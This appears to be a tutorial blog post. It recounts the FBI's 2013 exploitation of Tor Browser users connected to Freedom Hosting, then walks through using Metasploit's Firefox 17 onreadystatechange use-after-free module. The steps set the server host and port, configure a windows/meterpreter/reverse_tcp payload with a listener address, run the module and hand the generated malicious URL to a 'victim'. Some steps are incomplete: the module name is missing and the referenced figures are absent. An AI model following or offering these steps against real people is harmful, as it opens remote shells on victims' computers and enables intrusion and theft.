The Tor network is an anonymizing network that allows people to browse the web and access other services without being traced. As part of this network, there is the so-called “darknet,” servers accessible only through Tor, which host a variety of services from forums to e-mail.
It does this by directing Internet traffic through a volunteer network of more than 3,000 relays to conceal the user’s location. While many of these services are innocent and aimed at those concerned about human rights abuses, the anonymity naturally attracts those with criminal intent such as the distribution of child pornography. It’s then impossible for law enforcement agencies to trace the original IP address.
The Story Behind FBI and the TOR Exploit
Eric Eoin Marques, a US-born 28-year-old living in Dublin, Ireland, is accused of being the chief architect behind Freedom Hosting, which is responsible for hosting child porn on 550 servers throughout Europe.
Freedom Hosting is a major hidden services hosting provider that can only be accessed through the Tor network.
Freedom Hosting and Marques have been associated with child pornography, so Tor released a statement claiming that they are in no way associated with the people running Freedom Hosting:
Firefox onreadystatechange Event DocumentViewerImpl Use After Free
Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.
This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.
Launch terminal, run msfconsole, and type in use
Next type in show options to check all the available options for this exploit:
As we can see in the above figure, there are some options for this exploit. Now we can see here that the options that are required are showing “yes .” The first option is SRVHOST, which refers to the server host address; it means we have to set our local machine address here. The second option is SRVPORT; since the server port address is showing 8080, this means that port no.8080 must be enabled to successfully run this module.
Let us set the all required options type in set SRVHOST 192.168.0.3:
Now we are going to set a payload in this exploit. So type in set PAYLOAD windows/meterpreter/reverse_tcp:
Now again type in show options to check all the options for the exploit and whether the payload is set or not. Here we can see that our exploit’s options are set and our payload’s option needs to be set.
So type in set LHOST 192.168.0.103:
Now we are ready to run this module; type in run:
Now we can see in the above figure that, after running the run command, a malicious URL http://192.168.0.103:8080/2Hek0bdO is generated in msfconsole. Now what we have to do just pass this URL to the victim.
If the victim is using the vulnerable version of Mozilla Firefox, we will get this type of screen and the victim is compromised: